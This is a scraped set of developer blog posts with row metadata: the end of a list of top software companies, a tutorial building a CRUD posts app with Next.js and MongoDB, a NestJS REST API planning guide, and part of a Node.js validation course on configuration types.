Oracle </h2><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDXukkZ2DssNi68ZZlZt1MLQKVP52_kRrWhZdZ0giEebqaEQCqU7pZBJjdUHK6_ZLrH9USIDFOJNEq6C1HF2YYYTBeSbOMV8wJdTHHiEI-W5fjk6KpzsuW2GbGTd9_aZ6aKk0ROP01_JTBIQ-4uNUAlX90NTkny7CwfyIOkf0mtzcfR44x5mmGze2xAw/s360/top-10-software-companies-in-the-world2.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="46" data-original-width="360" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDXukkZ2DssNi68ZZlZt1MLQKVP52_kRrWhZdZ0giEebqaEQCqU7pZBJjdUHK6_ZLrH9USIDFOJNEq6C1HF2YYYTBeSbOMV8wJdTHHiEI-W5fjk6KpzsuW2GbGTd9_aZ6aKk0ROP01_JTBIQ-4uNUAlX90NTkny7CwfyIOkf0mtzcfR44x5mmGze2xAw/w320-h41/top-10-software-companies-in-the-world2.png" title="Top 10 Software Companies in the World" width="320" /></a><br /><br /><span style="font-size: medium;"><a href="https://en.wikipedia.org/wiki/Oracle" target="_blank">Oracle</a> is the second largest software company in the world. Larry ellison, bob miner and ed oates launched it on june 16, 1977. Oracle is located in redwood city, california. This company is the largest provider of database software and software as a service (saas) in the world. Oracle generated $32.9 billion in global revenue last year. Oracle software is commonly used in customer relationship management (crm), enterprise resource planning (erp), oracle epm cloud, human capital management (hcm), and supply chain management (scm). </span><br /><br /><h2 style="text-align: left;">3. 
Sap</h2></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtZ9ToEF3-xp6DjK0v7KYkhMYOBJVCg9IpfTWOWKtpSLUDZsYplznLOJagROx8VRnG2WT95ykHw-kTOeWJmt9FB-_o4gn0Ay9E1_cmH7EF2UNo2XrxQv3j12dneG8oYs85_VCaVWpYFiJ4f-SLs4py1j4UTBsToK78zb_Ho8MrNm-qq8iSWfqzQ3PkA/s371/top-10-software-companies-in-the-world3.png" style="margin-left: 1em; margin-right: 1em;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="135" data-original-width="371" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtZ9ToEF3-xp6DjK0v7KYkhMYOBJVCg9IpfTWOWKtpSLUDZsYplznLOJagROx8VRnG2WT95ykHw-kTOeWJmt9FB-_o4gn0Ay9E1_cmH7EF2UNo2XrxQv3j12dneG8oYs85_VCaVWpYFiJ4f-SLs4py1j4UTBsToK78zb_Ho8MrNm-qq8iSWfqzQ3PkA/w320-h116/top-10-software-companies-in-the-world3.png" title="Top 10 Software Companies in the World" width="320" /></a></div><br /><div><br /></div>
[Read More](https://www.geekstalk.space/2022/10/top-10-software-companies-in-world.html) | geekstalk | |
1,239,443 | A complete guide to Next.js plus MongoDB | by Joseph Chege Next.js is a database-agnostic web-based framework. It incorporates the latest... | 0 | 2022-11-02T00:10:26 | https://blog.openreplay.com/a-complete-guide-to-nextjs-plus-mongodb/ | react, mongodb, nextjs, webdev | by [Joseph Chege](https://blog.openreplay.com/authors/joseph-chege)
[Next.js](https://nextjs.org/) is a database-agnostic web-based framework. It incorporates the latest minimalistic technologies that help developers create web apps with minimal code bases. [MongoDB](https://www.mongodb.com/) is one of the most popular NoSQL databases. It would be ideal to discuss how to run MongoDB using Next.js applications. The tutorial will explain how to create a Next.js application, connect it to MongoDB, and perform database operations.
To fully understand this article, it is essential to have the following:
- [Node.js](https://nodejs.org/en/) installed on your computer.
- [MongoDB](https://www.mongodb.com/try/download/community) installed on your computer.
- Basic knowledge working with Next.js and JavaScript.
## Reasons for Running Next.js with MongoDB
Creating an application that leverages Next.js and MongoDB provides several benefits. These include:
- MongoDB provides cloud-hosted services using [MongoDB Atlas](https://www.mongodb.com/atlas/database). You can run your MongoDB anywhere and leverage its cloud-native capabilities.
- Easy deployment. Given that MongoDB provides cloud-hosted access, it becomes easy to deploy your full-stack application to hosting services such as [Vercel](https://medium.com/nerd-for-tech/5-reasons-why-vercel-is-the-best-for-application-deployment-92009b17e601). Such cloud platforms fit perfectly with your Next.js and MongoDB workflow.
- Next.js and MongoDB with One Click - With just one command, you can get a whole Next.js and MongoDB boilerplate application that you can use to create your extensive Next.js and MongoDB applications.
- Next.js is a framework that supports server-side rendering (SSR) and static site generation (SSG). This means you don't need an additional backend server to talk to MongoDB. Using Next.js, you can run your whole Next.js and MongoDB infrastructure within a single code base.
- Next.js [has a list of developer benefits](https://pagepro.co/blog/pros-and-cons-of-nextjs/#pros-of-nextjs-for-developers). These include greater community support, fast refresh, automatic Typescript configuration, API routes for Node.js serverless functions, etc.
Let's now dive in and create a Next.js application. In this article, we will implement a posts application using Next.js and MongoDB.
## Setting up a Next.js App
To create this application, we will use a one-time command that lets you create a MongoDB Next.js basic project. This will allow you to create an application ready and configured with all dependencies needed to access MongoDB. Proceed to your preferred working directory. Run the following command to bootstrap the application:
```
npx create-next-app --example with-mongodb posts_app
```
Here we use the usual `npx create-next-app` command to create a Next.js application locally. Adding the `--example with-mongodb` flag instructs Next.js to bootstrap a template application with a ready-to-use MongoDB setup. Finally, `posts_app` names the directory where the bootstrapped application will be saved in your working directory.
The above `create-next-app` command will create your application using Yarn as the default package manager. To create Next.js with your favorite package manager, you can go ahead and add the following flags right after `create-next-app`:
- Using NPM - `--use-npm`
- Using PNPM - `--use-pnpm`
Any of the above flags will Instruct the CLI to explicitly use the package of your choice to generate the project.
Note: Running the above command may take a moment, depending on your internet speed. Once the installation is done, proceed to the newly created `posts_app` directory:
```
cd posts_app
```
## Setting a MongoDB Environment
We need a working MongoDB environment to use with Next.js. You can use a locally installed [MongoDB Compass](https://www.mongodb.com/try/download/community) or the [cloud-hosted MongoDB Atlas](https://www.mongodb.com/atlas/database). From your environment of choice, copy your MongoDB connection URI; Next.js will use this URI to connect to MongoDB. Once the URI is ready, rename `.env.local.example` to `.env.local`.
Paste the MongoDB connection URI into `.env.local`. Below is an example URI for a locally installed MongoDB instance:
```
MONGODB_URI="mongodb://localhost:27017/posts"
```
At this point, we can run the application to check if Next.js can connect to the database. Start the development server using the following command:
```
npm run dev
```
Open the application using `http://localhost:3000/` on the browser. If the URI you have provided is not working correctly, Next.js will return the following error on your page:

If Next.js can access your MongoDB database, a **You are connected to MongoDB** message will be logged in your page as follows:

Let's digest how the created template connects to MongoDB, and what makes the one-command Next.js MongoDB example useful. When connecting these two yourself, you must write a script that establishes the MongoDB connection for Next.js.
When setting up the application, a `lib/mongodb.ts` file was created. This file contains the script needed to connect to your database, as follows:
```javascript
import { MongoClient } from 'mongodb'
if (!process.env.MONGODB_URI) {
throw new Error('Invalid environment variable: "MONGODB_URI"')
}
const uri = process.env.MONGODB_URI
const options = {}
let client
let clientPromise: Promise<MongoClient>
if (!process.env.MONGODB_URI) {
throw new Error('Please add your Mongo URI to .env.local')
}
if (process.env.NODE_ENV === 'development') {
// In development mode, use a global variable so that the value
// is preserved across module reloads caused by HMR (Hot Module Replacement).
if (!global._mongoClientPromise) {
client = new MongoClient(uri, options)
global._mongoClientPromise = client.connect()
}
clientPromise = global._mongoClientPromise
} else {
// In production mode, it's best to not use a global variable.
client = new MongoClient(uri, options)
clientPromise = client.connect()
}
// Export a module-scoped MongoClient promise. By doing this in a
// separate module, the client can be shared across functions.
export default clientPromise
```
Basically, this script creates a client that connects to your database. It saves the created connection and exports it so that other modules and functions you create can reuse the same connection to execute different operations on the database.
In any case, if you had just used plain `npx create-next-app posts_app`, you would be required to:
- Install MongoDB dependencies to your project
- Write a script to connect and save the connection as illustrated in the above `lib/mongodb.ts` file.
Great, you now have a complete MongoDB Next.js setup. Let's now dive in and build CRUD operations using this stack.
## Setting up the API Routes
Next.js allows you to create serverless API routes without creating an entire backend server. [API routes](https://nextjs.org/docs/api-routes/introduction) provide a solution for building your API with Next.js. Next.js uses server-side bundles that treat server code as an API endpoint instead of a page. It does that using the `pages/api` path. This way, any file under `api` will be treated as an endpoint. This provides an easy solution to build your own API within the same codebase.
### Creating API Handler Functions
Let's dive in and implement an API that will allow us to execute MongoDB. We will create a posts app that supports CRUD operations. Therefore, we need to create API functionalities for handling each procedure.
In the project folder, under the `pages` directory, create a folder and name it `api`. Inside the `api` directory, we will create the following files:
- `addPost.js`: For handling the functionality of creating posts.
```javascript
import clientPromise from "../../lib/mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { title, content } = req.body;
const post = await db.collection("posts").insertOne({
title,
content,
});
res.json(post);
} catch (e) {
console.error(e);
res.status(500).json({ error: e.message });
}
};
```
The above API route connects to the database and opens the `posts` collection. MongoDB's `insertOne` method sends a request to the server to add the document to the database, and the result is returned in the response.
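One thing the handler above does not do is validate `req.body` before inserting. A hypothetical helper like the following (not part of the tutorial code) could be called at the top of the handler to reject empty posts before they reach the database:

```javascript
// Hypothetical validation helper: returns a list of problems with the request body.
function validatePostBody(body) {
  const errors = [];
  if (!body || typeof body.title !== "string" || !body.title.trim()) {
    errors.push("title is required");
  }
  if (!body || typeof body.content !== "string" || !body.content.trim()) {
    errors.push("content is required");
  }
  return errors;
}

console.log(validatePostBody({ title: "Hi", content: "There" })); // []
console.log(validatePostBody({ title: "" })); // [ 'title is required', 'content is required' ]
```

In the handler you could then respond with a `400` status when the returned array is not empty.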
- `getPosts.js`: For handling the functionality of getting multiple posts.
```javascript
import clientPromise from "../../lib/mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const posts = await db.collection("posts").find({}).limit(20).toArray();
res.json(posts);
} catch (e) {
console.error(e);
res.status(500).json({ error: e.message });
}
};
```
To get data from MongoDB, call the `find()` method on the collection you want to fetch data from. You can chain modifiers such as `limit()`, which caps the number of posts the server returns from the database.
- `getPost.js`: For handling the functionality of getting a single post.
```javascript
import clientPromise from "../../lib/mongodb";
import { ObjectId } from "mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { id } = req.query;
const post = await db.collection("posts").findOne({
_id: new ObjectId(id),
});
res.json(post);
} catch (e) {
console.error(e);
res.status(500).json({ error: e.message });
}
};
```
Here we need a request that fetches a single post. This will let us handle operations such as UPDATE: `findOne()` returns the one document whose `_id` matches the id passed in the query string, making it easy to edit that post's properties.
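One caveat: constructing an `ObjectId` throws if the id is not a valid 24-character hex string, so a malformed query parameter would land in the catch block. A small hypothetical guard (not part of the tutorial code) could reject bad ids up front and return a `400` instead:

```javascript
// Hypothetical guard: a valid ObjectId string is exactly 24 hexadecimal characters.
function isValidObjectId(id) {
  return typeof id === "string" && /^[0-9a-fA-F]{24}$/.test(id);
}

console.log(isValidObjectId("635f0c2e9b1e8a5d4c3b2a19")); // true
console.log(isValidObjectId("not-an-id")); // false
```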
- `editPost.js`: For handling the functionality of updating a post.
```javascript
import clientPromise from "../../lib/mongodb";
import { ObjectId } from "mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { id } = req.query;
const { title, content } = req.body;
const post = await db.collection("posts").updateOne(
{
_id: new ObjectId(id),
},
{
$set: {
title: title,
content: content,
},
}
);
res.json(post);
} catch (e) {
console.error(e);
res.status(500).json({ error: e.message });
}
};
```
Using MongoDB's `updateOne()` method, we can expose an endpoint that sends updated data to the server. We match the existing post by its id and use `$set` to write the new field values to the database.
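The `$set` operator replaces only the fields you list and leaves the rest of the document untouched. As a plain-JavaScript illustration of that behavior (not driver code):

```javascript
// Hypothetical illustration of $set semantics: listed fields are replaced,
// everything else in the document is preserved.
function applySet(doc, set) {
  return { ...doc, ...set };
}

const post = { _id: "1", title: "Old title", content: "Old content" };
console.log(applySet(post, { title: "New title", content: "New content" }));
// { _id: '1', title: 'New title', content: 'New content' }
```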
- `deletePost.js`: For handling the functionality of deleting a post.
```javascript
import clientPromise from "../../lib/mongodb";
import { ObjectId } from "mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { id } = req.query;
const post = await db.collection("posts").deleteOne({
_id: new ObjectId(id),
});
res.json(post);
} catch (e) {
console.error(e);
res.status(500).json({ error: e.message });
}
};
```
Likewise, `deleteOne()` will get the job done whenever you want to delete an existing post from the database.
## Setting up Next.js Components
To allow easy navigation around the application, we will add components to Next.js. Create a `components` directory in the project root folder (`post_app`). Inside the `components` folder, create the following files:
- `Nav.tsx`: Navigation bar.
```javascript
import React from "react";
import styles from "./styles/Nav.module.css";
export default function Nav() {
return (
<nav className={styles.navbar}>
<div className={styles.navItems}>
<ul>
<li>
<a href="/">My Posts</a>
</li>
<li>
<a href="/posts">Add Post</a>
</li>
</ul>
</div>
</nav>
);
}
```
This Navigation bar will allow you to execute two routes/pages:
1. Home page for displaying posts - denoted using the `/` path.
2. Add a post page for adding new posts - the `/posts` path denotes this page.
We will configure the above pages later in this guide.
- `Layout.tsx`: General application layout.
```javascript
import React from "react";
import Navbar from "./Nav";
export default function Layout(props: any) {
return (
<div>
<Navbar />
{props.children}
</div>
);
}
```
To add basic styling to the above components, create the `styles` directory inside the `components` directory. Then create the following file and add the respective styling:
- `Nav.module.css`: Navigation bar styles.
```css
.navbar {
width: 100%;
display: flex;
justify-content: center;
border-bottom: 1px solid #d4d5d5;
}
.navItems ul {
display: flex;
justify-content: space-between;
align-items: center;
list-style-type: none;
}
.navItems ul li {
margin-right: 10px;
}
.navItems ul li a {
text-decoration: none;
}
```
<h2>Open Source Session Replay</h2>
_<a href="https://github.com/openreplay/openreplay" target="_blank">OpenReplay</a> is an open-source, session replay suite that lets you see what users do on your web app, helping you troubleshoot issues faster. OpenReplay is self-hosted for full control over your data._

_Start enjoying your debugging experience - <a href="https://github.com/openreplay/openreplay" >start using OpenReplay for free</a>._
## Setting up the Application Pages
[Pages](https://nextjs.org/docs/basic-features/pages) are [React components](https://reactjs.org/docs/components-and-props.html) accessible as routes on the browser.
Next.js provides a `pages` folder that treats files as routes, and every page has a route mapped to it based on its file name. Let's dive in and implement pages for executing the CRUD operations based on the API endpoints we created.
In the `pages` directory, we will need the following:
- `index.tsx`: The home page showing the added posts. This file is already created in your project `pages` folder.
- `posts` directory: To host the following files:
- `index.tsx`: For adding a post.
- `[id].tsx`: For editing a post.
Ensure you create the `posts` folder inside the `pages` directory and add the above two files.
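With those files in place, the pages router maps them to URLs roughly like this (a sketch of Next.js file-system routing, where the bracket segment is a dynamic route):

```javascript
// pages/index.tsx        → "/"
// pages/posts/index.tsx  → "/posts"
// pages/posts/[id].tsx   → "/posts/[id]"  (dynamic segment, e.g. /posts/635f...)
const routeFor = (file) =>
  file
    .replace(/^pages/, "")
    .replace(/\.tsx?$/, "")
    .replace(/\/index$/, "") || "/";

console.log(routeFor("pages/index.tsx")); // "/"
console.log(routeFor("pages/posts/[id].tsx")); // "/posts/[id]"
```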
### Setting up the Home Page
The home page's content will be hosted inside the `pages/index.tsx` file. First, we will display the Navigation and Layout component we created. We will then create a component to display the posts from the database. Inside this component, we will add two buttons:
- To delete each post.
- To launch the edit page and update the selected post.
### Getting Data from MongoDB
In the `pages/index.tsx`, import the necessary packages:
```javascript
import {useState} from 'react';
import Layout from '../components/Layout';
```
Define the types for getting Posts as follows:
```javascript
type Props = {
  posts: [Post];
};
type Post = {
  _id: string;
  title: string;
  content: string;
};
```
Get the posts from the server using the `getServerSideProps()`:
```javascript
export async function getServerSideProps() {
try {
let response = await fetch('http://localhost:3000/api/getPosts');
let posts = await response.json();
return {
props: { posts: JSON.parse(JSON.stringify(posts)) },
};
} catch (e) {
console.error(e);
}
}
```
[getServerSideProps](https://nextjs.org/docs/basic-features/data-fetching/get-server-side-props) runs on the server on every request. Next.js calls it before rendering the page, passes the returned `props` to the page component, and sends the fully rendered HTML to the browser. Because the data is fetched per request, the page always reflects the current state of the database.
In this example, we use `getServerSideProps` to fetch data from the API we created and hand the result to the page through `props`. This way, the page can be [hydrated](https://reactjs.org/docs/react-dom.html#hydrate) correctly: the initial HTML already contains the fetched data, and React takes over on the client.
Go ahead and define the function to render the view to the client as follows:
```javascript
export default function Posts(props: Props) {
const [posts, setPosts] = useState<[Post]>(props.posts);
const handleDeletePost = async (postId: string) => {
try {
let response = await fetch(
"http://localhost:3000/api/deletePost?id=" + postId,
{
method: "POST",
headers: {
Accept: "application/json, text/plain, */*",
"Content-Type": "application/json",
},
}
);
await response.json();
window.location.reload();
} catch (error) {
console.log("An error occurred while deleting ", error);
}
};
}
```
Note that we are also handling the post-delete functionality here. When the component is rendered on the client, the user should be able to delete any selected post, so ensure you append the `postId` to the delete endpoint; this tells the server which post to remove from the database. When the delete succeeds, we reload the page with `window.location.reload()` to show the updated list of posts.
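As a side note, a full `window.location.reload()` re-fetches the whole page. Since the component already keeps the posts in state via `setPosts`, a hypothetical alternative (not what the tutorial code does) is to drop the deleted post from local state instead:

```javascript
// Hypothetical helper: remove a deleted post from local state without a full reload.
function removeDeletedPost(posts, postId) {
  return posts.filter((post) => post._id !== postId);
}

// e.g. inside handleDeletePost: setPosts(removeDeletedPost(posts, postId));
console.log(removeDeletedPost([{ _id: "1" }, { _id: "2" }], "1")); // [ { _id: '2' } ]
```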
Finally, return the view to the client inside the above `Posts()` method as follows:
```javascript
return (
<Layout>
<div className="posts-body">
<h1 className="posts-body-heading">Top 20 Added Posts</h1>
{posts.length > 0 ? (
<ul className="posts-list">
{posts.map((post, index) => {
return (
<li key={index} className="post-item">
<div className="post-item-details">
<h2>{post.title}</h2>
<p>{post.content}</p>
</div>
<div className="post-item-actions">
<a href={`/posts/${post._id}`}>Edit</a>
<button onClick={() => handleDeletePost(post._id as string)}>
Delete
</button>
</div>
</li>
);
})}
</ul>
) : (
<h2 className="posts-body-heading">Ooops! No posts added so far</h2>
)}
</div>
<style jsx>
{`
.posts-body {
width: 400px;
margin: 10px auto;
}
.posts-body-heading {
font-family: sans-serif;
}
.posts-list {
list-style-type: none;
display: block;
}
.post-item {
width: 100%;
padding: 10px;
border: 1px solid #d5d5d5;
}
.post-item-actions {
display: flex;
justify-content: space-between;
}
.post-item-actions a {
text-decoration: none;
}
`}
</style>
</Layout>
);
```
Here we will display the posts from the database. Each post will have a button to delete and edit it. We are also adding a path that will execute the edit route.
Let's check the app and see what we got so far. Ensure your server is up and running, or use the following command:
```
npm run dev
```
Open `http://localhost:3000/` in the browser to view the application.

Here is our application. And **Oops! No posts have been added so far**. Let's dive in and add some posts.
### Adding Posts to MongoDB
In `pages/posts/index.tsx`, import the necessary packages:
```javascript
import React, { useState } from "react";
import Layout from "../../components/Layout";
```
Define a function for adding a post:
```javascript
export default function AddPost() {
const [title, setTitle] = useState("");
const [content, setContent] = useState("");
const [error, setError] = useState("");
const [message, setMessage] = useState("");
const handleSubmit = async (e: any) => {
e.preventDefault();
if (title && content) {
try {
let response = await fetch("http://localhost:3000/api/addPost", {
method: "POST",
body: JSON.stringify({
title,
content,
}),
headers: {
Accept: "application/json, text/plain, */*",
"Content-Type": "application/json",
},
});
await response.json();
setTitle("");
setContent("");
setError("");
setMessage("Post added successfully");
} catch (errorMessage: any) {
setError(errorMessage);
}
} else {
return setError("All fields are required");
}
};
}
```
Inside the above `AddPost()`, render a form to insert data as follows:
```javascript
return (
<Layout>
<form onSubmit={handleSubmit} className="form">
{error ? <div className="alert-error">{error}</div> : null}
{message ? <div className="alert-message">{message}</div> : null}
<div className="form-group">
<label>Title</label>
<input
type="text"
placeholder="Title of the post"
onChange={(e) => setTitle(e.target.value)}
value={title}
/>
</div>
<div className="form-group">
<label>Content</label>
<textarea
name="content"
placeholder="Content of the post"
value={content}
onChange={(e) => setContent(e.target.value)}
cols={20}
rows={8}
/>
</div>
<div className="form-group">
<button type="submit" className="submit_btn">
Add Post
</button>
</div>
</form>
<style jsx>
{`
.form {
width: 400px;
margin: 10px auto;
}
.form-group {
width: 100%;
margin-bottom: 10px;
display: block;
}
.form-group label {
display: block;
margin-bottom: 10px;
}
.form-group input[type="text"] {
padding: 10px;
width: 100%;
}
.form-group textarea {
padding: 10px;
width: 100%;
}
.alert-error {
width: 100%;
color: red;
margin-bottom: 10px;
}
.alert-message {
width: 100%;
color: green;
margin-bottom: 10px;
}
`}
</style>
</Layout>
);
```
Let's test this functionality. Click **Add Post** on your application.

Enter the post details and click the **Add Post** button. If the post is successfully added, a message will be displayed as so:

If you head over to the home page or click **My Posts**, you should get the added posts:

Likewise, these changes should be reflected in your database as follows:

You can also try to see if delete is working as expected.
### Updating Posts to MongoDB
At this point, our application can communicate with MongoDB and add, read and delete items. Let's now try to update these added items from Next.js.
In the `pages/posts/[id].tsx` file import the necessary packages:
```javascript
import React, { useState } from "react";
import type { GetStaticPropsContext, GetStaticPropsResult } from "next";
import Layout from "../../components/Layout";
```
Define the types for sending updated values:
```javascript
type PageParams = {
id: string;
};
type ContentPageProps = {
post: Post;
};
type Post = {
_id: string;
title: string;
content: string;
};
type ResponseFromServer = {
title: string;
content: string;
_id: string;
};
```
Statically get the post by sending an API request to the database:
```javascript
export async function getStaticProps({
params,
}: GetStaticPropsContext<PageParams>): Promise<
GetStaticPropsResult<ContentPageProps>
> {
try {
let response = await fetch(
"http://localhost:3000/api/getPost?id=" + params?.id
);
let responseFromServer: ResponseFromServer = await response.json();
return {
// Passed to the page component as props
props: {
post: {
_id: responseFromServer._id,
title: responseFromServer.title,
content: responseFromServer.content,
},
},
};
} catch (e) {
console.log("error ", e);
return {
props: {
post: {
_id: "",
title: "",
content: "",
},
},
};
}
}
export async function getStaticPaths() {
let posts = await fetch("http://localhost:3000/api/getPosts");
let postFromServer: [Post] = await posts.json();
return {
paths: postFromServer.map((post) => {
return {
params: {
id: post._id,
},
};
}),
fallback: false, // can also be true or 'blocking'
};
}
```
Define the function to render the view.
```javascript
export default function EditPost({
post: { _id, title, content },
}: ContentPageProps) {
const [postTitle, setPostTitle] = useState(title);
const [postContent, setPostContent] = useState(content);
const [error, setError] = useState("");
const [message, setMessage] = useState("");
const handleSubmit = async (e: any) => {
e.preventDefault();
if (postTitle && postContent) {
try {
let response = await fetch(
"http://localhost:3000/api/editPost?id=" + _id,
{
method: "POST",
body: JSON.stringify({
title: postTitle,
content: postContent,
}),
headers: {
Accept: "application/json, text/plain, */*",
"Content-Type": "application/json",
},
}
);
await response.json();
setPostTitle("");
setPostContent("");
setError("");
setMessage("Post edited successfully");
} catch (errorMessage: any) {
setError(errorMessage);
}
} else {
return setError("All fields are required");
}
};
// no such post exists
if (!title && !content && !_id && typeof window !== "undefined") {
return (window.location.href = "/");
}
return (
<Layout>
<form onSubmit={handleSubmit} className="form">
{error ? <div className="alert-error">{error}</div> : null}
{message ? <div className="alert-message">{message}</div> : null}
<div className="form-group">
<label>Title</label>
<input
type="text"
placeholder="Title of the post"
onChange={(e) => setPostTitle(e.target.value)}
value={postTitle ? postTitle : ""}
/>
</div>
<div className="form-group">
<label>Content</label>
<textarea
name="content"
placeholder="Content of the post"
value={postContent ? postContent : ""}
onChange={(e) => setPostContent(e.target.value)}
cols={20}
rows={8}
/>
</div>
<div className="form-group">
<button type="submit" className="submit_btn">
Update
</button>
</div>
</form>
<style jsx>
{`
.form {
width: 400px;
margin: 10px auto;
}
.form-group {
width: 100%;
margin-bottom: 10px;
display: block;
}
.form-group label {
display: block;
margin-bottom: 10px;
}
.form-group input[type="text"] {
padding: 10px;
width: 100%;
}
.form-group textarea {
padding: 10px;
width: 100%;
}
.alert-error {
width: 100%;
color: red;
margin-bottom: 10px;
}
.alert-message {
width: 100%;
color: green;
margin-bottom: 10px;
}
`}
</style>
</Layout>
);
}
```
Ensure your development server is up and running. On your home page, click Edit:

The selected post will be loaded to the update form placeholder:

You can now go ahead and edit your post. Once done, click **Update**. The changes will be reflected on the home page, and they should be reflected in your database as well.
## Conclusion
That's a wrap for this guide. You can now comfortably run CRUD operations against your database using only Next.js. For code references, check the application in this [GitHub repository](https://github.com/kimkimani/nextjs_with-mongodb).
I hope you found this helpful. Happy coding!
> A TIP FROM THE EDITOR: For more on MongoDB plus Next, don't miss our [Authentication And DB Access With Next, Prisma, And MongoDB](https://blog.openreplay.com/authentication-and-db-access-with-next-prisma-and-mongodb/) article!
[](https://newsletter.openreplay.com/)
| asayerio_techblog |
1,239,792 | Build Restful Api With Nestjs the Right Way | Foreword If you are new with NestJS or you have been worked with it for several projects, this... | 0 | 2022-11-02T05:17:18 | https://dev.to/nextjsvietnam/build-restful-api-with-nestjs-the-right-way-4606 | nestjs, restapi, nextjsvietnam, typescript | > Foreword
If you are new to NestJS or have already worked with it on several projects, this post is for you. In this article, I'll share a real-world process for building a Restful API from scratch with NestJS.
Okay, let's start. Imagine we already have detailed specifications.
These are the requirements for this sample:
Create a Restful API for an image storage service that allows the following:
1. Users can register to the system. They need to verify their account (via email) before using it.
2. Users can only use the system if they have an active account.
3. Users can upload images in png, jpg, or jpeg format. The maximum size is 5MB.
4. A user's images won't be public unless they create a shared link and share it with other people.
5. A user's images can be used on other websites.
6. A user can have a maximum of 100 images.
7. The system will automatically delete unused images (unused for more than one year) every weekend.
Infrastructure requirements:
1. Local : Local Docker
2. Staging: Run on VM with Docker
3. Production: Host everything on AWS
First of all, we need to write down what we have to do.
- [x] Install NestJS CLI
- [x] Setup your dev tools: vscode, config for debug, code linter
- [x] Design source code structure: seperate them into layers
- [x] Setup your local docker (database only)
- [x] Setup your application's configuration
- [x] Setup data access layer and configuration
- [x] Business Layer: define business models: inputModels, outputModels
- [x] Presentation Layer: define controllers
- [x] Presentation Layer: integrate data validation from business models
- [x] Business Layer: define business service
- [x] Presentation Layer: integrate with business layer
- [x] Presentation Layer: create swagger - the api document
- [x] Persistence Layer: define database's entities, create and run migration scripts, seeds
- [x] Persistence Layer: define repositories
- [x] Business Layer: integrate repository with business layer
- [x] Setup your staging docker: dockerfile, docker compose, setup scripts
- [x] Setup your CI/CD flow and setup on your staging
- [x] Design and setup AWS Infrastructure
### And assume that we already have the high level designs



## Step 1 : Install NestJS CLI
```bash
npm i -g @nestjs/cli
nest new your-project-name
```
## Step 2: Setup your dev tools
1. How to debug NestJS in VSCode?
> .vscode/launch.json
```json
{
"configurations": [
{
"name": "Debug API",
"type": "node",
"program": "${workspaceFolder}/src/application/api/main.ts",
"runtimeArgs": [
"-r",
"ts-node/register",
"-r",
"tsconfig-paths/register"
],
"console": "integratedTerminal",
"request": "launch",
"skipFiles": ["<node_internals>/**"],
"outFiles": ["${workspaceFolder}/**/*.js", "!**/node_modules/**"]
},
{
"name": "Debug remote api",
"type": "node",
"request": "attach",
"remoteRoot": "/app",
"localRoot": "${workspaceFolder}",
"port": 9229,
"restart": true,
"address": "0.0.0.0",
"skipFiles": ["<node_internals>/**"]
}
]
}
```
> Debug main app (file storage api)
F5 -> Select Debug API
Make sure your program path is your api's main file
> Eg: "program": "${workspaceFolder}/src/application/api/main.ts",
> Debug remote
Example: Start app in debug mode - debugger port 9229
F5 -> Select Debug remote API
```bash
npm run start:debug
```
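For the remote-attach configuration above to connect, the app must expose the Node inspector on the matching address and port. As an assumption (the script NestJS generates by default is `nest start --debug --watch` — adjust to your setup), the `package.json` script could look like:

```json
{
  "scripts": {
    "start:debug": "nest start --debug 0.0.0.0:9229 --watch"
  }
}
```

Binding to `0.0.0.0` matters when the app runs inside Docker, so the debugger can reach port 9229 from outside the container.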
## Step 3: Design source code structure
**Overview layers**

1. solutions
- deployment -> deployment scripts, dockerfiles, k8s, ...
2. src
- src/application -> applications: file-storage-api, web, queues, ...
- src/domain -> Tables mapping
- src/business -> Business logic
- src/share -> Share/Common projects
- src/persistence -> TypeORM Core
- src/config -> config: log,environment, configuration
3. test -> test configuration
**domain layer**

**application layer**

**business layer**

**persistence layer**

**config layer**

This is the high-level design.
You can visit [Build Restful Api With Nestjs the Right Way](https://nextjsvietnam.com/post/build-restful-api-with-nestjs-the-right-way/) for more detail examples.
Have a good day!
Made with love by [Nextjs VietNam](https://nextjsvietnam.com/) | nextjsvietnam |
1,240,020 | 28-Nodejs Course 2023: Validation Part VI: Custom Validation | We have made such an amazing progress in validation, but there is still more to be done. ... | 20,274 | 2022-11-02T16:18:07 | https://dev.to/hassanzohdy/28-nodejs-course-2023-validation-part-vi-custom-validation-31g1 | node, typescript, mongodb, fastify | ---
title: 28-Nodejs Course 2023: Validation Part VI: Custom Validation
published: true
description:
series: Nodejs Course 2023
tags: nodejs, typescript, mongodb, fastify
#cover_image:
# Use a ratio of 100:42 for best results.
---
We have made amazing progress on validation, but there is still more to be done.
## Configurations Types
We have successfully created the configurations list, but let's give it a fancier touch: let's define a type for it.
Create `types.ts` file in `src/core/validator` directory.
```ts
// src/core/validator/types.ts
export type ValidationConfigurations = {
/**
* Whether to stop validator after first failed rule
*
* @default true
*/
stopOnFirstFailure?: boolean;
}
```
We added only one property for now to illustrate how I write these types.
We first write the documentation comment; if the property has a default value, we record it in the documentation, and then we define the type.
Now let's add the rest of the configurations.
```ts
// src/core/validator/types.ts
import Rule from "./rules/rule";
export type ValidationConfigurations = {
/**
* Whether to stop validator after first failed rule
*
* @default true
*/
stopOnFirstFailure?: boolean;
/**
* Return Error Strategy
* If strategy is `first` then it will return a single error in string from the rule errors list
* If strategy is `all` then it will return an array of string that contains all errors.
*
* The `all` strategy will be affected as well with `stopOnFirstFailure` if it is set to `true`
* and strategy is set to `all` it will always return an array with one value
*
* @default first
*/
returnErrorStrategy?: "first" | "all";
/**
* Response status code
*
* @default 400
*/
responseStatus?: number;
/**
* Validation keys
*/
keys?: {
/**
* Response error key that will wrap the entire errors
*
* @default errors
*/
response?: string;
/**
* Input key name
*
* @default input
*/
inputKey?: string;
/**
* Single Error key (when strategy is set to first)
*
* @default error
*/
